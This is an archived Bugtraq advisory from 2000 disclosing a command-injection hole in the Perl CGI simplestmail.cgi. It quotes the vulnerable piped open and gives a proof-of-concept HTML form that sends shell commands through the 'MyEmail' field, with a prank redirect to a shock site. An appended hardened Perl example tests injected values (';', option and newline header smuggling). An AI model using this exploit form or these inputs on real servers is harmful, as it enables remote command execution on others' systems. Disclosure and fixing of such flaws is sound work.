[18028] in bugtraq
Insecure input validation in simplestmail.cgi (remote command
daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 16:43:38 2000
Message-Id: <20001211224440.C505E24C504@lists.securityfocus.com>
Date: Mon, 11 Dec 2000 14:46:39 GMT
Reply-To: rpc <h@ckz.org>
From: rpc <h@CKZ.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi Again,
simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif Wright.
It's available from:
http://www.conservatives.net/atheist/scripts/index.html?simplestmail
The code is self-explanatory:
----code snippet----
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";
-----------------
Exploitation is straightforward:
<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>
--rpc
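
A hardened form of the `open` call quoted in the post, as an added example that is not part of the original message or of the script: it checks `MyEmail` against an allowlist and uses Perl's list-form pipe open so that no shell ever parses the value. The MTA path, the `valid_address` and `send_mail` names, and the sample inputs are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: MTA path; the original script defines $mailprog itself.
my $mailprog = '/usr/sbin/sendmail';

# Allowlist: a single plain address. \A...\z anchors reject embedded or
# trailing newlines; a leading '-' (MTA option) cannot match either.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]{0,63}\@[A-Za-z0-9][A-Za-z0-9.-]*\.[A-Za-z]{2,}\z/ ? 1 : 0;
}

# Hardened replacement for: open (MAIL, "|$mailprog $youremail")
# Not called in the demo below, so the script runs without an MTA installed.
sub send_mail {
    my ($addr, $body) = @_;
    die "rejected recipient\n" unless valid_address($addr);
    # List-form pipe open: Perl execs $mailprog directly with this argument
    # vector, so no shell parses $addr. '--' ends MTA option processing.
    open(my $mail, '|-', $mailprog, '--', $addr)
        or die "Can't run $mailprog: $!\n";
    print {$mail} "To: $addr\nSubject: form submission\n\n$body\n";
    close($mail) or die "$mailprog failed, status $?\n";
    return 1;
}

# Constructed sample inputs (not from a real request log).
my @samples = (
    'user@example.org',                        # ordinary address
    ';',                                       # the form value from the post
    '-t user@example.org',                     # would be read as an MTA option
    "user\@example.org\nBcc: x\@example.net",  # newline smuggling a header
);
for my $s (@samples) {
    (my $shown = $s) =~ s/\n/\\n/g;            # make the newline visible
    printf "%-40s %s\n", $shown, valid_address($s) ? 'accept' : 'reject';
}
```

Only the first sample is accepted; the other three are rejected before any process is started.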